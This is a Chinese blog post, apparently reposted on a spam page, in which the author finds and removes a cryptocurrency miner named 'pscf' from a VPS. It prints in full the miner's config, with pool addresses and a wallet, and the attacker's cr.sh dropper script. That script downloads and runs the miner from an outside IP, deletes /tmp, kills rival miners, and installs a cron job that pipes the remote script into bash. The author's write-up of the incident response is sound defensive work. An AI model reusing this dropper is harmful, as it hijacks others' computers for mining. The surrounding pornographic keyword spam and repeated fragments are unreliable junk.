亚洲第一区操,熟妇AV天堂一区

emmmm居然中了一次挖礦病毒pscf

發(fā)現(xiàn)

微皮艾斯最近不太能連上，時(shí)斷時(shí)續(xù)，想重新部署一個(gè)順便搭個(gè)梯子。
完成之后發(fā)現(xiàn)才幾十k的速度，ping一下100多ms也還ok的呀，感覺(jué)不太對(duì)，top一下看到一個(gè)普通用戶(hù)下一個(gè)pscf進(jìn)程99%以上的占用，我嚓攤上事兒啦

解決1

直接kill進(jìn)程，done。速度并沒(méi)有什么變化，再top一下，嗯？pscf又跳出來(lái)了。
這時(shí)候還沒(méi)覺(jué)得是病毒，考慮是不是一鍵搭梯子的時(shí)候是不是需要什么文件沒(méi)有控制好死循環(huán)之類(lèi)的。

lsof -c pscf查看到運(yùn)行的文件看到一條/var/tmp/pscf -c /var/tmp/wc.conf
打開(kāi)/var/tmp/pscf看到是一個(gè)編譯過(guò)的執(zhí)行文件，這文件干啥的也看不懂。

ls -al /var/tmp/查看一下發(fā)現(xiàn)時(shí)間不對(duì)呀，今天才搭梯子這pscf的文件日期是5天前呢。

繼續(xù)看/var/tmp/wc.conf內(nèi)容

{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,                // algorithm variation, 0 auto select
    "background": true,    // true to run the miner in the background
    "colors": true,         // false to disable colored output    
    "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": 5,   // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1,      // donate level, mininum 1%
    "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
    "print-time": 60,       // print hashrate report every N seconds
    "retries": 5,           // number of times to retry before switch to backup server
    "retry-pause": 5,       // time to pause between retries
    "safe": false,          // true to safe adjust threads and av settings for current CPU
    "threads": null,        // number of miner threads
    "pools": [
        {
            "url": "158.69.133.20:3333",   // URL of mining server
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
            "pass": "x",                       // password for mining server
            "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
            "nicehash": false                  // enable nicehash/xmrig-proxy support
        },
        {
            "url": "192.99.142.249:3333",   // URL of mining server
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
            "pass": "x",                       // password for mining server
            "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
            "nicehash": false                  // enable nicehash/xmrig-proxy support
        },
        {
            "url": "202.144.193.110:3333",   // URL of mining server
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
            "pass": "x",                       // password for mining server
            "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
            "nicehash": false                  // enable nicehash/xmrig-proxy support
        }
    ],    
    "api": {
        "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,                  // access token for API
        "worker-id": null                      // custom worker-id for API
    }
}

雖然沒(méi)見(jiàn)過(guò)挖礦病毒但是里面這寫(xiě)參數(shù)還有出現(xiàn)的幾個(gè)miner，感覺(jué)中獎(jiǎng)了。
繼續(xù)查看/var/tmp/config.json 內(nèi)容和wc.config一樣

遂百度pscf，翻了幾頁(yè)都沒(méi)有，百度挖礦病毒搜到的都是minerd之類(lèi)的，解決方式就是刪文件之類(lèi)的，我這刪了又生成啊。這時(shí)候又想到另一個(gè)辦法。

解決2

既然還生成那我直接把運(yùn)行讀取那些權(quán)限去掉不就好了嗎？
于是chmod 000 /var/tmp/pscf
kill 21414
top
嗯，有效果，過(guò)會(huì)再看f**k又跳出來(lái)pscf進(jìn)程了，
ls -al /var/tmp/ 咦，這次又來(lái)一個(gè)pscf3，唉，果然是我太年輕了。

解決3

繼續(xù)百度linux病毒之類(lèi)的東西，突然發(fā)現(xiàn)有個(gè)說(shuō)定時(shí)任務(wù)，嗯？感覺(jué)有可能。
crontab -l 提示此用戶(hù)下沒(méi)有定時(shí)任務(wù)，繼續(xù)，查看 vi /etc/crontab 也沒(méi)有定時(shí)任務(wù)，再找 vi /var/spool/cron/z 發(fā)現(xiàn)這個(gè)目錄下面居然有個(gè)z開(kāi)始用戶(hù)的文件這個(gè)用戶(hù)沒(méi)有設(shè)置過(guò)定時(shí)任務(wù)呀，于是打開(kāi)，果然發(fā)現(xiàn)了一條

* * * * * wget -q -O http://192.99.142.226:8220/cr.sh

然后wget http://192.99.142.226:8220/cr.sh下來(lái)看一下

#!/bin/bash

pkill -f /var/tmp/java
pkill -f /tmp/java
pkill -f zz.sh
pkill -f https
pkill -f 192.99.142.232
pkill -f 46.249.38.186
rm -rf /var/tmp/java
pkill -f 185.222.210.59
pkill -f ririg
rm -rf /tmp
rm -rf /var/tmp/j*
rm -rf /var/tmp/t*
rm -rf /tmp/t*
ps ax | grep /tmp/ | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf' | grep -v grep | grep -v 'ppl\|pscf' | awk '{print $1}' | xargs kill -9
rm -rf /tmp/java
pkill -f pscc
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/pscf
pkill -f wo.conf
pkill -f gmr
rm -rf /var/tmp/java
rm -rf /var/tmp/ppc
DIR="/var/tmp"
if [ -a "/var/tmp/pscf" ]
then
    if [ -w "/var/tmp/pscf" ] && [ ! -d "/var/tmp/pscf" ]
    then
        if [ -x "$(command -v md5sum)" ]
        then
            sum=$(md5sum /var/tmp/pscf | awk '{ print $1 }')
            echo $sum
            case $sum in
                c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                    echo "pscf OK"
                ;;
                *)
                    echo "pscf wrong"
                    pkill -f wc.conf
                    pkill -f pscf
                    sleep 4
                ;;
            esac
        fi
        echo "P OK"
    else
        DIR=$(mktemp -d)/var/tmp
        mkdir $DIR
        echo "T DIR $DIR"
    fi
else
    if [ -d "/var/tmp" ]
    then
        DIR="/var/tmp"
    fi
    echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/pscf" ]
then
    DIR=$(mktemp -d)/var/tmp
    mkdir $DIR
    echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
    WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
    WGET="wget -O";
fi
f2="192.99.142.226:8220"

downloadIfNeed()
{
    if [ -x "$(command -v md5sum)" ]
    then
        if [ ! -f $DIR/pscf ]; then
            echo "File not found!"
            download
        fi
        sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
        echo $sum
        case $sum in
            c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                echo "pscf OK"
            ;;
            *)
                echo "pscf wrong"
                sizeBefore=$(du $DIR/pscf)
                if [ -s /usr/bin/curl ];
                then
                    WGET="curl -k -o ";
                fi
                if [ -s /usr/bin/wget ];
                then
                    WGET="wget --no-check-certificate -O ";
                fi
                #$WGET $DIR/pscf https://transfer.sh/wbl5H/pscf
                download
                sumAfter=$(md5sum $DIR/pscf | awk '{ print $1 }')
                if [ -s /usr/bin/curl ];
                then
                    echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/pscf` > $DIR/var/tmp.txt
                fi
            ;;
        esac
    else
        echo "No md5sum"
        download
    fi
}

download() {
    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/pscf3 | awk '{ print $1 }')
        echo $sum
        case $sum in
            c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                echo "pscf OK"
                cp $DIR/pscf3 $DIR/pscf
            ;;
            *)
                echo "pscf wrong"
                download2
            ;;
        esac
    else
        echo "No md5sum"
        download2
    fi
}

download2() {
    if [ `getconf LONG_BIT` = "64" ]
    then
        $WGET $DIR/pscf http://192.99.142.226:8220/xm64
    fi

    if [ -x "$(command -v md5sum)" ]
    then
        sum=$(md5sum $DIR/pscf | awk '{ print $1 }')
        echo $sum
        case $sum in
            c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
                echo "pscf OK"
                cp $DIR/pscf $DIR/pscf3
            ;;
            *)
                echo "pscf wrong"
            ;;
        esac
    else
        echo "No md5sum"
    fi
}


if [ ! "$(ps -fe|grep '/var/tmp/pscf'|grep 'wc.conf'|grep -v grep)" ];
then
    downloadIfNeed
    chmod +x $DIR/pscf
    $WGET $DIR/wc.conf http://$f2/wt.conf
    nohup $DIR/pscf -c $DIR/wc.conf > /dev/null 2>&1 &
    sleep 5
else
    echo "Running"
fi
if crontab -l | grep -q "192.99.142.226:8220"
then
    echo "Cron exists"
else
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
    (crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/cr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
pkill -f /var/tmp/java
pkill -f /var/tmp/java
pkill -f 192.99.142.232
chmod 777 /var/tmp/pscf
crontab -l | sed '/185.222.210.59/d' | crontab -

霍！沒(méi)錯(cuò)就是你了，簡(jiǎn)單看一下就是下載文件，執(zhí)行挖礦程序，加入定時(shí)任務(wù)，這么一看套路也很一般呀。

解決4

vi /var/spool/cron/z** 刪除定時(shí)任務(wù)保存文件；
kill 21969 pscf進(jìn)程；
rm /var/tmp/pscf /var/tmp/wc.conf /var/tmp/config.json
繼續(xù)top查看，沒(méi)有出現(xiàn)pscf進(jìn)程，cpu占用正常。

后記

雖然已經(jīng)解決了占用的問(wèn)題，執(zhí)行文件也刪除了，但是這個(gè)挖礦病毒的定時(shí)任務(wù)是如何加到系統(tǒng)里的，下一步還要繼續(xù)查找問(wèn)題。
百度的時(shí)候有人說(shuō)可能有ssh留了后門(mén)之類(lèi)的，我查看了.ssh/authorized_keys和/etc/ssh/sshd_config 并沒(méi)有發(fā)現(xiàn)什么問(wèn)題，明天繼續(xù)觀察一下。
干掉這個(gè)挖礦程序后梯子的速度一下就翻倍的上去了，開(kāi)心。
順手查了一下ip加拿大的，果然啊。

色偷偷精品伊人,欧洲久久精品,欧美综合婷婷骚逼,国产AV主播,国产最新探花在线,九色在线视频一区,伊人大交九欧美,1769亚洲,黄色成人av

六號(hào)線晚報(bào)0722

六號(hào)線晚報(bào)0722

emmmm居然中了一次挖礦病毒pscf

發(fā)現(xiàn)

解決1

解決2

解決3

解決4

后記

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容

色偷偷精品伊人,欧洲久久精品,欧美综合婷婷骚逼,国产AV主播,国产最新探花在线,九色在线视频一区,伊人大交九 欧美,1769亚洲,黄色成人av

六號(hào)線晚報(bào)0722

emmmm居然中了一次挖礦病毒pscf

發(fā)現(xiàn)

解決1

解決2

解決3

解決4

后記

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容

色偷偷精品伊人,欧洲久久精品,欧美综合婷婷骚逼,国产AV主播,国产最新探花在线,九色在线视频一区,伊人大交九欧美,1769亚洲,黄色成人av